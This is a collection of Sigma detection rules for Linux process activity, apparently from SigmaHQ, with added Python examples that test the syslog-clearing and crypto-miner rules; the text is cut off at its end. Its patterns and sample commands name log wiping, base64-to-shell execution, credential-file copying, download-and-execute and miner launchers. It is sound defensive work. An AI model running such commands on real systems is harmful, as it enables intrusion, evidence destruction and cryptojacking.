    "path": "rules/linux/process_creation/proc_creation_lnx_base64_decode.yml",
    "content": "title: Decode Base64 Encoded Text\nid: e2072cab-8c9a-459b-b63c-40ae79e27031\nstatus: test\ndescription: Detects usage of base64 utility to decode arbitrary base64-encoded text\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/base64'\n        CommandLine|contains: '-d' # Also covers \"--decode\"\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_base64_execution.yml",
    "content": "title: Linux Base64 Encoded Pipe to Shell\nid: ba592c6d-6888-43c3-b8c6-689b8fe47337\nstatus: test\ndescription: Detects suspicious process command line that uses base64 encoded input for execution with a shell\nreferences:\n    - https://github.com/arget13/DDexec\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-26\nmodified: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_base64:\n        CommandLine|contains: 'base64 '\n    selection_exec:\n        - CommandLine|contains:\n              - '| bash '\n              - '| sh '\n              - '|bash '\n              - '|sh '\n        - CommandLine|endswith:\n              - ' |sh'\n              - '| bash'\n              - '| sh'\n              - '|bash'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml",
    "content": "title: Linux Base64 Encoded Shebang In CLI\nid: fe2f9663-41cb-47e2-b954-8a228f3b9dff\nstatus: test\ndescription: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded\nreferences:\n    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html\n    - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - \"IyEvYmluL2Jhc2\" # Note: #!/bin/bash\"\n            - \"IyEvYmluL2Rhc2\" # Note: #!/bin/dash\"\n            - \"IyEvYmluL3pza\" # Note: #!/bin/zsh\"\n            - \"IyEvYmluL2Zpc2\" # Note: #!/bin/fish\n            - \"IyEvYmluL3No\" # Note: # !/bin/sh\"\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml",
    "content": "title: Bash Interactive Shell\nid: 6104e693-a7d6-4891-86cb-49a258523559\nstatus: test\ndescription: Detects execution of the bash shell with the interactive flag \"-i\".\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\n    - https://linux.die.net/man/1/bash\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/bash'\n        CommandLine|contains: ' -i '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml",
    "content": "title: Enable BPF Kprobes Tracing\nid: 7692f583-bd30-4008-8615-75dab3f08a99\nstatus: test\ndescription: Detects common command used to enable bpf kprobes tracing\nreferences:\n    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\n    - https://bpftrace.org/\n    - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'echo 1 >'\n            - '/sys/kernel/debug/tracing/events/kprobes/'\n        CommandLine|contains:\n            - '/myprobe/enable'\n            - '/myretprobe/enable'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml",
    "content": "title: BPFtrace Unsafe Option Usage\nid: f8341cb2-ee25-43fa-a975-d8a5a9714b39\nstatus: test\ndescription: Detects the usage of the unsafe bpftrace option\nreferences:\n    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\n    - https://bpftrace.org/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2022-02-11\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'bpftrace'\n        CommandLine|contains: '--unsafe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the unsafe option\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml",
    "content": "title: Linux Setgid Capability Set on a Binary via Setcap Utility\nid: 3a716279-c18c-4488-83be-f9ececbfb9fc\nstatus: experimental\ndescription: |\n    Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.\n    This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).\n    This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.\nreferences:\n    - https://man7.org/linux/man-pages/man8/setcap.8.html\n    - https://dfir.ch/posts/linux_capabilities/\n    - https://juggernaut-sec.com/capabilities/#cap_setgid\nauthor: Luc Génaux\ndate: 2026-01-24\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1554\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/setcap'\n        CommandLine|contains: 'cap_setgid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml",
    "content": "title: Linux Setuid Capability Set on a Binary via Setcap Utility\nid: ed447910-bc30-4575-a598-3a2e49516a7a\nstatus: experimental\ndescription: |\n    Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.\n    This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).\n    This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.\nreferences:\n    - https://man7.org/linux/man-pages/man8/setcap.8.html\n    - https://dfir.ch/posts/linux_capabilities/\n    - https://juggernaut-sec.com/capabilities/#cap_setuid\nauthor: Luc Génaux\ndate: 2026-01-24\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1554\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/setcap'\n        CommandLine|contains: 'cap_setuid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml",
    "content": "title: Capabilities Discovery - Linux\nid: d8d97d51-122d-4cdd-9e2f-01b4b4933530\nstatus: test\ndescription: Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\n    - https://github.com/carlospolop/PEASS-ng\n    - https://github.com/diego-treitos/linux-smart-enumeration\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2026-01-24\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/getcap'\n        CommandLine|contains: ' -r '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml",
    "content": "title: Capsh Shell Invocation - Linux\nid: db1ac3be-f606-4e3a-89e0-9607cbe6b98a\nstatus: test\ndescription: |\n    Detects the use of the \"capsh\" utility to invoke a shell.\nreferences:\n    - https://gtfobins.github.io/gtfobins/capsh/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/capsh'\n        CommandLine|endswith: ' --'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml",
    "content": "title: Remove Immutable File Attribute\nid: 34979410-e4b5-4e5d-8cfb-389fdff05c12\nrelated:\n    - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7\n      type: derived\nstatus: test\ndescription: Detects usage of the 'chattr' utility to remove immutable file attribute.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chattr'\n        CommandLine|contains: ' -i '\n    condition: selection\nfalsepositives:\n    - Administrator interacting with immutable files (e.g. for instance backups).\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml",
    "content": "title: Linux Sudo Chroot Execution\nid: f2bed782-994e-4f40-9cd5-518198cb3fba\nstatus: experimental\ndescription: |\n    Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.\n    Attackers may use this technique to evade detection and execute commands in a modified environment.\n    This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.\n    While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.\nreferences:\n    - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh\nauthor: Swachchhanda Shrawn Poudel (Nextron Systems)\ndate: 2025-10-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains:\n            - ' --chroot '\n            - 'sudo -R '\n    condition: selection\nfalsepositives:\n    - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clear_logs.yml",
    "content": "title: Clear Linux Logs\nid: 80915f59-9b56-4616-9de0-fd0dea6c12fe\nstatus: stable\ndescription: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-07\nmodified: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'    # covers /rmdir as well\n            - '/shred'\n            - '/unlink'\n        CommandLine|contains:\n            - '/var/log'\n            - '/var/spool/mail'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml",
    "content": "title: Syslog Clearing or Removal Via System Utilities\nid: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31\nstatus: test\ndescription: |\n    Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\n    - https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior\nauthor: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2025-10-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_file:\n        CommandLine|contains: '/var/log/syslog'\n    selection_command_rm:\n        # Examples:\n        #   rm -f /var/log/syslog\n        Image|endswith: '/rm'\n        CommandLine|contains:\n            - ' -r '\n            - ' -f '\n            - ' -rf '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n    selection_command_unlink:\n        # Examples:\n        #   unlink /var/log/syslog\n        Image|endswith: '/unlink'\n    selection_command_mv:\n        # Examples:\n        #   mv /var/log/syslog\n        Image|endswith: '/mv'\n    selection_command_truncate:\n        # Examples:\n        #   truncate --size 0 /var/log/syslog\n        Image|endswith: '/truncate'\n        CommandLine|contains|all:\n            - '0 '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n        CommandLine|contains:\n            - '-s '\n            - '-c '\n            - '--size'\n    selection_command_ln:\n        # Examples:\n        #   ln -sfn /dev/null /var/log/syslog\n        Image|endswith: '/ln'\n        CommandLine|contains|all:\n            - 
'/dev/null '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n        CommandLine|contains:\n            - '-sf '\n            - '-sfn '\n            - '-sfT '\n    selection_command_cp:\n        # Examples:\n        #   cp /dev/null /var/log/syslog\n        Image|endswith: '/cp'\n        CommandLine|contains: '/dev/null'\n    selection_command_shred:\n        # Examples:\n        #   shred -u /var/log/syslog\n        Image|endswith: '/shred'\n        CommandLine|contains: '-u '\n    selection_unique_other:\n        CommandLine|contains:\n            - ' > /var/log/syslog'\n            - ' >/var/log/syslog'\n            - ' >| /var/log/syslog'  # redirection empties w spacing, noclobber\n            - ': > /var/log/syslog'\n            - ':> /var/log/syslog'\n            - ':>/var/log/syslog'\n            - '>|/var/log/syslog'\n    selection_unique_journalctl:\n        CommandLine|contains:\n            - 'journalctl --vacuum'\n            - 'journalctl --rotate' # archives current journal files and creates new empty ones\n    condition: (selection_file and 1 of selection_command_*) or 1 of selection_unique_*\nfalsepositives:\n    - Log rotation.\n    - Maintenance.\nlevel: high\n"
  },
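As an added worked example (not part of the SigmaHQ repository or written by the rule's authors), the Python below transcribes the detection block of the syslog-clearing rule above into a small evaluator for the Sigma `contains`, `startswith`, `endswith`, `re` and `all` modifiers and runs it over constructed `process_creation` events. It shows which command lines the rule alerts on, that `rm /var/log/syslog` without any flags still fires because the `/var/log/syslog` value is OR-ed into the `rm` selection, and that the log-rotation false positive the rule lists (`mv /var/log/syslog /var/log/syslog.1`) fires as well. The field names `Image` and `CommandLine` follow the rule; the sample events are constructed, not real telemetry, and the evaluator implements only the modifiers these rules use, not the full Sigma specification.

```python
import re

# Hand-transcribed detection block of Sigma rule 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31
# ("Syslog Clearing or Removal Via System Utilities"). Keys keep the Sigma
# "Field|modifier" spelling; the rule's condition is implemented in syslog_rule_matches().
SYSLOG_RULE = {
    "selection_file": {"CommandLine|contains": "/var/log/syslog"},
    "selection_command_rm": {
        "Image|endswith": "/rm",
        "CommandLine|contains": [" -r ", " -f ", " -rf ", "/var/log/syslog"],
    },
    "selection_command_unlink": {"Image|endswith": "/unlink"},
    "selection_command_mv": {"Image|endswith": "/mv"},
    "selection_command_truncate": {
        "Image|endswith": "/truncate",
        "CommandLine|contains|all": ["0 ", "/var/log/syslog"],
        "CommandLine|contains": ["-s ", "-c ", "--size"],
    },
    "selection_command_ln": {
        "Image|endswith": "/ln",
        "CommandLine|contains|all": ["/dev/null ", "/var/log/syslog"],
        "CommandLine|contains": ["-sf ", "-sfn ", "-sfT "],
    },
    "selection_command_cp": {"Image|endswith": "/cp", "CommandLine|contains": "/dev/null"},
    "selection_command_shred": {"Image|endswith": "/shred", "CommandLine|contains": "-u "},
    "selection_unique_other": {
        "CommandLine|contains": [
            " > /var/log/syslog", " >/var/log/syslog", " >| /var/log/syslog",
            ": > /var/log/syslog", ":> /var/log/syslog", ":>/var/log/syslog",
            ">|/var/log/syslog",
        ],
    },
    "selection_unique_journalctl": {
        "CommandLine|contains": ["journalctl --vacuum", "journalctl --rotate"],
    },
}


def _value_matches(actual, modifiers, pattern):
    """One field value against one pattern. Sigma string matching is case-insensitive;
    the `re` modifier is a plain regex search on the raw value."""
    if "re" in modifiers:
        return re.search(pattern, actual) is not None
    a, p = actual.lower(), pattern.lower()
    if "contains" in modifiers:
        return p in a
    if "startswith" in modifiers:
        return a.startswith(p)
    if "endswith" in modifiers:
        return a.endswith(p)
    return a == p


def selection_matches(selection, event):
    """Every field entry of a selection must match (AND). A list of values is OR-ed,
    unless the `all` modifier turns it into an AND."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        actual = event.get(field)
        if actual is None:
            return False
        values = patterns if isinstance(patterns, list) else [patterns]
        results = [_value_matches(actual, modifiers, p) for p in values]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def syslog_rule_matches(event):
    """condition: (selection_file and 1 of selection_command_*) or 1 of selection_unique_*"""
    hits = {name: selection_matches(sel, event) for name, sel in SYSLOG_RULE.items()}
    any_command = any(v for k, v in hits.items() if k.startswith("selection_command_"))
    any_unique = any(v for k, v in hits.items() if k.startswith("selection_unique_"))
    return (hits["selection_file"] and any_command) or any_unique


# Constructed process_creation events (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/rm", "CommandLine": "rm -f /var/log/syslog"},
    {"Image": "/usr/bin/rm", "CommandLine": "rm /var/log/syslog"},            # no flags, still fires
    {"Image": "/usr/bin/truncate", "CommandLine": "truncate -s 0 /var/log/syslog"},
    {"Image": "/usr/bin/ln", "CommandLine": "ln -sfn /dev/null /var/log/syslog"},
    {"Image": "/usr/bin/cp", "CommandLine": "cp /dev/null /var/log/syslog"},
    {"Image": "/usr/bin/shred", "CommandLine": "shred -u /var/log/syslog"},
    {"Image": "/usr/bin/bash", "CommandLine": "bash -c :> /var/log/syslog"},
    {"Image": "/usr/bin/journalctl", "CommandLine": "journalctl --vacuum-time=2d"},
    {"Image": "/usr/bin/mv", "CommandLine": "mv /var/log/syslog /var/log/syslog.1"},  # rotation FP
    {"Image": "/usr/bin/cat", "CommandLine": "cat /var/log/syslog"},          # read only: no alert
    {"Image": "/usr/bin/rm", "CommandLine": "rm -rf /var/log/nginx"},         # other log: no alert
]


def run_rule(events=SAMPLE_EVENTS):
    """Return the command lines of the events the rule alerts on."""
    return [e["CommandLine"] for e in events if syslog_rule_matches(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print("ALERT" if syslog_rule_matches(e) else "     ", e["CommandLine"])
```

The same `selection_matches` helper evaluates the other selections on this page unchanged, including the `CommandLine|re: '(.){200,}'` entry of the file-discovery rule further down; only the per-rule `condition` line needs hand-translating as done in `syslog_rule_matches`.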
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml",
    "content": "title: Clipboard Collection with Xclip Tool\nid: ec127035-a636-4b9a-8555-0efd4e59f316\nstatus: test\ndescription: |\n    Detects attempts to collect data stored in the clipboard of users via the xclip tool. Xclip has to be installed.\n    Using this rule on servers is highly recommended; on user workstations clipboard utilities are used heavily, so expect noise there.\nreferences:\n    - https://www.packetlabs.net/posts/clipboard-data-security/\nauthor: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-09-15\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|contains: 'xclip'\n        CommandLine|contains|all:\n            - '-sel'\n            - 'clip'\n            - '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml",
    "content": "title: Copy Passwd Or Shadow From TMP Path\nid: fa4aaed5-4fe0-498d-bbc0-08e3346387ba\nstatus: test\ndescription: Detects when the file \"passwd\" or \"shadow\" is copied with a tmp path as source or destination (the rule only checks that the cp command line references /tmp/)\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-31\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '/cp'\n    selection_path:\n        CommandLine|contains: '/tmp/'\n    selection_file:\n        CommandLine|contains:\n            - 'passwd'\n            - 'shadow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml",
    "content": "title: Crontab Enumeration\nid: 403ed92c-b7ec-4edd-9947-5b535ee12d46\nstatus: test\ndescription: Detects usage of crontab to list the tasks of the user\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1007\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/crontab'\n        CommandLine|contains: ' -l'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crontab\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml",
    "content": "title: Remove Scheduled Cron Task/Job\nid: c2e234de-03a3-41e1-b39a-1e56dc17ba67\nstatus: test\ndescription: |\n    Detects usage of the 'crontab' utility to remove the current crontab.\n    This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'crontab'\n        CommandLine|contains: ' -r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml",
    "content": "title: Linux Crypto Mining Indicators\nid: 9069ea3c-b213-4c52-be13-86506a227ab1\nstatus: test\ndescription: Detects command line parameters or strings often used by crypto miners\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\nmodified: 2022-12-25\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' --cpu-priority='\n            - '--donate-level=0'\n            - ' -o pool.'\n            - ' --nicehash'\n            - ' --algo=rx/0 '\n            - 'stratum+tcp://'\n            - 'stratum+udp://'\n            # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives\n            - 'sh -c /sbin/modprobe msr allow_writes=on'\n            # base64 encoded: --donate-level=\n            - 'LS1kb25hdGUtbGV2ZWw9'\n            - '0tZG9uYXRlLWxldmVsP'\n            - 'tLWRvbmF0ZS1sZXZlbD'\n            # base64 encoded: stratum+tcp:// and stratum+udp://\n            - 'c3RyYXR1bSt0Y3A6Ly'\n            - 'N0cmF0dW0rdGNwOi8v'\n            - 'zdHJhdHVtK3RjcDovL'\n            - 'c3RyYXR1bSt1ZHA6Ly'\n            - 'N0cmF0dW0rdWRwOi8v'\n            - 'zdHJhdHVtK3VkcDovL'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crypto miners\nlevel: high\n"
  },
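The three base64 strings the crypto-mining rule above lists per indicator are the same plaintext encoded at the three possible byte alignments: a substring of base64 output depends on the indicator's byte offset modulo 3 inside whatever it is embedded in, so one encoding would miss two thirds of `echo <b64> | base64 -d | sh` launchers. As an added example (not code from the rule's author or from SigmaHQ), the Python below derives those fragments from the plaintext with the usual dummy-byte-and-trim technique, so the list can be verified or extended for new indicators, and matches them against constructed launcher command lines. The launcher strings and the `xmrig` invocations inside them are constructed for the example, not captured telemetry.

```python
import base64

# Number of leading base64 characters whose value depends on 0, 1 or 2 unknown bytes
# preceding the indicator (the dummy bytes below stand in for those unknown bytes).
_LEADING_CHARS_TO_DROP = (0, 2, 3)


def base64_variants(plaintext: str) -> list:
    """Return the three alignment-independent base64 fragments of *plaintext*.

    For k in (0, 1, 2) the text is encoded behind k dummy bytes. The leading characters
    that mix in the dummy bytes are dropped, as are the '=' padding and the final
    character of an incomplete last 3-byte group (it would change if more data followed).
    """
    raw = plaintext.encode()
    variants = []
    for k in (0, 1, 2):
        enc = base64.b64encode(b"\x00" * k + raw).decode().rstrip("=")
        enc = enc[_LEADING_CHARS_TO_DROP[k]:]
        if (k + len(raw)) % 3:          # last 3-byte group is incomplete
            enc = enc[:-1]
        variants.append(enc)
    return variants


def encoded_indicator_hit(command_line: str, indicator: str) -> bool:
    """True when any base64 alignment of *indicator* occurs in *command_line*.
    Base64 is case-sensitive, so unlike Sigma's plain string matching nothing is lowercased."""
    return any(v in command_line for v in base64_variants(indicator))


def sample_launchers() -> list:
    """Constructed 'echo <b64> | base64 -d | sh' launchers (not real telemetry). The miner
    command lines are chosen so that '--donate-level=' starts at byte offsets 6, 13 and 8,
    i.e. alignments 0, 1 and 2, one per variant."""
    miners = [
        b"xmrig --donate-level=0 -o pool.example:3333",
        b"xmrig -c cfg --donate-level=0",
        b"./xmrig --donate-level=0",
    ]
    return ["sh -c 'echo %s | base64 -d | sh'" % base64.b64encode(m).decode() for m in miners]


if __name__ == "__main__":
    for indicator in ("--donate-level=", "stratum+tcp://", "stratum+udp://"):
        print(indicator, base64_variants(indicator))
    for launcher in sample_launchers():
        print(encoded_indicator_hit(launcher, "--donate-level="), launcher)
```

Running it reproduces the nine encoded strings in the rule exactly, which is a quick way to audit such lists: a fragment that was generated by hand from a single `base64` invocation, without the trimming, would silently match only one alignment.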
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_curl_usage.yml",
    "content": "title: Curl Usage on Linux\nid: ea34fb97-e2c4-4afb-810f-785e4459b194\nstatus: test\ndescription: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml",
    "content": "title: Suspicious Download and Execute Pattern via Curl/Wget\nid: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa\nstatus: experimental\ndescription: |\n    Detects suspicious use of command-line tools such as curl or wget to download remote\n    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by\n    immediate execution, indicating potential malicious activity. This pattern is commonly used\n    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.\nreferences:\n    - https://gtfobins.github.io/gtfobins/wget/\n    - https://gtfobins.github.io/gtfobins/curl/\nauthor: Aayush Gupta\ndate: 2025-06-17\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_downloader:\n        CommandLine|contains:\n            - '/curl'\n            - '/wget'\n    selection_tmp:\n        CommandLine|contains:\n            - '/tmp/'\n            - '/dev/shm/'\n    selection_executor:\n        CommandLine|contains: 'sh -c'\n    condition: all of selection_*\nfalsepositives:\n    - System update scripts using temporary files\n    - Installer scripts or automated provisioning tools\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml",
